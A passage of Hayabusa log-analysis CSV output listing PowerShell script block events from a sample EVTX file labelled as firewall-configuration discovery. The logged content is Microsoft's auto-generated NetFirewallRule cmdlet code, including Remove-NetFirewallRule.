$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletizat,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ion_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 